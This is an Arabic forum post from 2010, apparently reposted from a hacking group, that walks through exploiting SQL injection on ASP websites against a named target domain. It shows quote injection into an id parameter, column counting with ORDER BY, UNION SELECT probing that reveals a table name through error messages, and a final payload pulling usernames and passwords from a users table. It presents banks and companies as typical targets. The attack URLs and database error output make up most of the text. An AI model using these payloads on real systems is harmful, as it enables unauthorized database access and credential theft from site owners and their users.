السلام عليكم ورحمة الله وبركاته
اليوم وبعد انقطاع عن المواضيع .. قررت اعمل لكم شرح عن استغلال ثغرات asp ..
هذه البرمجة نادرة الاستخدام الا فى المواقع الكبيرة مثل البنوك والشركات ..
ساشرح لكم كيفية استغلال خطأ sql تابع معى ..
انا ساشرج لكم على موقع www.haybersqlogretiyo.com
المنطقة المصابة بثغرة sql نضع بعد الرابط وبعد المتغير علامة " او '
www.haybersqlogretiyo.com/baskabibolum.asp?id=10"
يظهر لنا الخطأ التالى :
كود PHP:
Microsoft JET Database Engine error ’80040e14’
Syntax error in string in query expression ’id = 10";’.
/baskabirbolum.asp, line 7
لان نبدا نعد بالاعمدة للوصول الى العمود المطلوب
http://www.haybersqlogretiyo.com/bas...=10+order+by+1
الان عند الوصول الى العمود المصاب وهو 10
http://www.haybersqlogretiyo.com/bas...10+order+by+10
يظهر الخطأ التالى :
كود PHP:
Microsoft JET Database Engine error ’80040e14’
The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression.
/news.asp, line 7
ويكون العمود المصاب الرقم 8
http://www.haybersqlogretiyo.com/bas...=10+order+by+8
http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7--
الان عند الوصول الى الرقم 7 يظهر لنا هذا الخطا وبداخله اسم القاعدة
كود PHP:
Microsoft JET Database Engine error ’80040e37’
The Microsoft Jet database engine cannot find the input table or query ’hayber’. Make sure it exists and that its name is spelled correctly.
/baskabirbolum.asp, line 7
واسمها : hayber
ويتم استغلالها .
http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7+from+hayber
والان نظهر اسم اليوزر والباس
http://www.haybersqlogretiyo.com/bas...0,username,pas sword,3,4,5,6,7+from+users
تحياتي
 | اقتباس |  | | | | | | | | | |
منقول عن قراصنه نابلس
Mr.X
| |  | |  | |
avp lfs' : hsjyghg eyvhj Asp fhpjvht >>
07-08-2010, 09:29 PM
شرح مبسط : استغلال ثغرات Asp باحتراف .. 
المواضيع المتشابهه 
العرض الشجري
